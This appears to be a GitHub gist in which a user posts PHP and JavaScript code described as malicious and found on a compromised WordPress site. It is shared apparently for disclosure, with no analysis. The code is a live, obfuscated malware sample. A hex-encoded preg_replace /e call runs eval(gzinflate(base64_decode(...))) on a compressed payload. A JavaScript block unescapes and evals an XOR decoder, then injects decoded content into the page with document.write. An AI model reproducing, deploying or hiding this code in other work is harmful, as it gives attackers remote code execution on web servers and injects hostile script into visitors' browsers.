Skip to content

Instantly share code, notes, and snippets.

@andy-williams
Created April 15, 2014 08:49
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save andy-williams/10714894 to your computer and use it in GitHub Desktop.
Save andy-williams/10714894 to your computer and use it in GitHub Desktop.
Malicious PHP code I found in a wordpress site
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZfNjuNGDITvAfIOg8UcksvCUv9JWORN5iLZFnIIcsruet8+zeJHS6MEE+QgWD/dbLJYLNKvj+uf0++Pl5fPv718enu0S7/Gt0ct/Wpvj7Ltz/atXvs19Cv5u3HqV/8+9nXjvV+L3+ubvb/6b+m/ra9NtV/l8Nz83bvvw/vnnA7P3VaaTuvbe3v5tD/NJ3vl9L1+cN7ZH/M3fxDPv/l3jv9s73ze0V46+ZdO5/e1+YzfR/7Vf573v/YT39j9bj3Xxfb3b7nf1wX+2P4BnO3Z8O97mj0bjyxfxp/N9+S+vplPo/PL9uXNz7Fc2rn11q9+Vu1rK8+23mznu8dgfDVbur/5mWbD/GyD89jOHtf+zdaFHzePUVgu/GbfY+fZOSXyZvGubsuezYZhYr5Z7LbP+G951XNyvOXX5njU7m+6eBw5ONDc/2pYLb6ukF/jbyXPiToUJyYwI09ldl8aODz3JH+X0qcvP//02uO/bDkKXoXcN+UbBX73BNg7S0ojcRlQLFADTU7PkGNxJ5ToC+KROXgh4MlJcVxjiSsNApF4syUCXRwMs9Oq76+ri4++VX9v+wQQBNE3CNUAx2IzwJXEi58hYCOZE8LWiOPiyVd8YGJ+GlZGnig6EWvxRAhDMNPajffTjpf84Ex7JxIWt2lnt+PzTBHwvlKAtqeUA86F4mr+K8INjoftz+RC+Nx8nXDb3I5Evnpsjf0q1ObkVHyD36tYKL50KAxhkuHJ4Pjm2fMl3xBB44+40sh98vWGx7Pgi2Nozw1xlt8zsQ+eHztT+/DXsJfYXOBshi/JeSG7cFG4X/0cYVUQowEBauAWz5vbsfzpjOZrxJfV32U4+2wAk9sX92ePU/FV8ry4H4l8m2i0EI9DjWgvDdb8sf06e8GnFazTzgWJpn1rXvDD98f3r1HwOchFEFHklvA07SRMkDeMhaJL9fJeSAGqHKIgZT8Daijh4DaC7JniNAIZkRTIAlFWwGtOUhXc7GdJSROJGLkfUEKmD9mrKD4drka3GvCl7b4auRoEjeJUt4susdDhbhTH7DioC9CVYnLKUQgTBAmCkii7l8hu2KFLZYozMM+QtCIelXXqoAMY01FVwBUCLNijUA2fTF6V2xmhh/RWiJpQKHLzTTlaKXa6XUb4zB877ykkM/uudKcJbsEpYVk9PonQxjdI3SgyNYuYHhAGce2AeSX35pO67h1OFHgTokyxik8I+RPrcZ/CKqKQ6j69lHwoshG7E343vi3RUeF9IccLojv7pTMz+6NxHCal1HZBUIw0EQlqNDMmBDUAhLnQ/Ap7o7nW1Qt+/vHt8dez4NNeKDUKbUTh6BKN8SQzLtcYE2cSdKNDBtFWVBC1kohkVJ0EFMYfI7E6IEDKHxROVzp0TaYKEY8OGcUl9Yu/IwuFiso31E9A3QF2gfhBJDrKM2ZAU6IGbF4ZKTNAB5HxXaMjZ6uIUefolOajJbyyNwShxuQT42vzuAoJTXkv4EpnC/JrlK1uozAeqtvOTBkImPnWwCoKUkJd94JSxw7CgnsLEg77BJAoxBSTAxONchhCiq0CwSUkAxPTiC+IfGP6KnR7TW9p73INAarhz81tCOOBSSBE9ZivSp4W4q97flLEUoiFglZDYuRWt02eR62/gnVwLhpdPQhj8mtknG9l7/jj8a/o+Pb+r+d/PSeK//C3WZf51gv7/m3545dX/q5/fok53u68wdudKv/XL38D'\x29\x29\x29\x3B","");
?>
<html>
<head>
</head>
<body>
<script type="text/javascript">
<!--
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%61%65%39%64%34%61%36%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%35%37%33%36%31%38%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%35%39%30%37%38%35%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%34%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%61%65%39%64%34%61%36%28%27') + '%47%75%65%71%6a%71%7b%21%71%7d%73%61%44%21%7a%6b%7b%7f%36%6d%60%73%65%70%6f%73%6a%76%7a%21%45%14%0d%7f%6c%76%23%7a%76%7c%26%43%23%75%6c%78%21%41%65%7f%61%29%2a%30%69%6e%7f%5d%6e%74%60%2c%2a%37%14%09%6f%68%23%2b%77%70%7e%20%39%23%49%44%23%36%2f%23%78%14%0d%7e%64%72%6f%7b%7e%35%72%71%60%62%7d%6e%76%7b%24%46%2c%23%6b%7a%7a%73%39%36%30%6e%7a%73%35%63%75%34%6a%7c%79%72%4a%7a%23%36%11%09%89%14%09%42%31%70%60%73%6e%71%71%4212573618%37%32%32%37%37%35%33' + unescape('%27%29%29%3b'));
// -->
</script>
<noscript><i>Javascript required</i></noscript>
</html><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" prefix="og: http://ogp.me/ns#">
<head>
...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment